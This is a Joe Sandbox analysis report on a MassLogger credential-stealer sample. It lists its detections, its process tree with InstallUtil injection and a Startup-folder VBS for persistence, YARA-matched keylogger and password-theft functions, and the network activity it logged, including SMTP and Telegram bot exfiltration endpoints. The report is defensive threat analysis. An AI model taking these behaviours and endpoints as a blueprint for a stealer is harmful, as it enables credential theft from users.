Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TtLlwb3ava.exe

Overview

General Information

Sample name:TtLlwb3ava.exe
renamed because original name is a hash value
Original sample name:1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d.exe
Analysis ID:1634734
MD5:1e20ce6bbf686369929e0d191f9607ad
SHA1:7abc4e70e996ec2e05bfc1417db7daf49d12032e
SHA256:1622c28fa57b7ff8998eac6ae42e6cb6662446c47b25ff24befb841356267c7d
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TtLlwb3ava.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\TtLlwb3ava.exe" MD5: 1E20CE6BBF686369929E0D191F9607AD)
    • InstallUtil.exe (PID: 6996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7272 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Activator.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\Activator.exe" MD5: 1E20CE6BBF686369929E0D191F9607AD)
      • InstallUtil.exe (PID: 7368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
      00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0xdfb7:$a1: get_encryptedPassword
      • 0xe2df:$a2: get_encryptedUsername
      • 0xdd52:$a3: get_timePasswordChanged
      • 0xde73:$a4: get_passwordField
      • 0xdfcd:$a5: set_encryptedPassword
      • 0xf929:$a7: get_logins
      • 0xf5da:$a8: GetOutlookPasswords
      • 0xf3cc:$a9: StartKeylogger
      • 0xf879:$a10: KeyLoggerEventArgs
      • 0xf429:$a11: KeyLoggerEventArgsEventHandler
      00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
        00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 45 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.TtLlwb3ava.exe.5380000.8.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0.2.TtLlwb3ava.exe.5380000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              11.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.InstallUtil.exe.400000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                  11.2.InstallUtil.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 35 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , ProcessId: 7272, ProcessName: wscript.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 209.182.213.250, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6996, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49696
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs" , ProcessId: 7272, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\TtLlwb3ava.exe, ProcessId: 6708, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-11T04:11:36.972985+010028032742Potentially Bad Traffic192.168.2.649692132.226.8.16980TCP
                    2025-03-11T04:11:46.817416+010028032742Potentially Bad Traffic192.168.2.649692132.226.8.16980TCP
                    2025-03-11T04:11:51.708081+010028032742Potentially Bad Traffic192.168.2.649697132.226.8.16980TCP
                    2025-03-11T04:12:02.301801+010028032742Potentially Bad Traffic192.168.2.649697132.226.8.16980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: TtLlwb3ava.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Activator.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.qzqju
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Activator.exeReversingLabs: Detection: 78%
                    Multi AV Scanner detection for submitted file
                    Source: TtLlwb3ava.exeVirustotal: Detection: 72%Perma Link
                    Source: TtLlwb3ava.exeReversingLabs: Detection: 78%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: TtLlwb3ava.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49694 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49699 version: TLS 1.0
                    Source: TtLlwb3ava.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003A3F000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1247789807.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0103081F
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0103082C
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 4x nop then jmp 0557C3B0h0_2_0557C1D8
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 4x nop then jmp 0557C3B0h0_2_0557C1C9
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exeCode function: 4x nop then jmp 055B35BEh0_2_055B3210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04A89741h2_2_04A89490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04A89E6Ah2_2_04A89A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04A89E6Ah2_2_04A89D97
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 04A89E6Ah2_2_04A89A4B
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_018C081F
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_018C082C
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_018C07C7
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 05F5C3B0h10_2_05F5C1D8
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 05F5C3B0h10_2_05F5C1C9
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 060D2088h10_2_060D1FC9
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 060D2088h10_2_060D1FD0
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 060F35BEh10_2_060F3521
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 060F35BEh10_2_060F3201
                    Source: C:\Users\user\AppData\Roaming\Activator.exeCode function: 4x nop then jmp 060F35BEh10_2_060F3210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 03029731h11_2_03029480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 03029E5Ah11_2_03029A40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 03029E5Ah11_2_03029A30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 03029E5Ah11_2_03029D87
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C08830h11_2_05C08588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C047C9h11_2_05C04520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C0F700h11_2_05C0F458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C076D0h11_2_05C07428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C0E9F8h11_2_05C0E750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C05929h11_2_05C05680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C0E5A0h11_2_05C0E180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C083D8h11_2_05C08130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C0F2A8h11_2_05C0F000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C07278h11_2_05C07250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C054D1h11_2_05C05228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C05079h11_2_05C04DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C07F80h11_2_05C07CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C04C21h11_2_05C04978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C07B28h11_2_05C07880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C0FB58h11_2_05C0F8B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C0EE50h11_2_05C0EBA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05C05E15h11_2_05C05AD8
                    Source: global trafficTCP traffic: 192.168.2.6:49696 -> 209.182.213.250:587
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                    Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49692 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49697 -> 132.226.8.169:80
                    Source: global trafficTCP traffic: 192.168.2.6:49696 -> 209.182.213.250:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49694 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49699 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: mail.ncsp.pk
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.0000000003071000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.ncsp.pk
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.ncsp.pkd
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
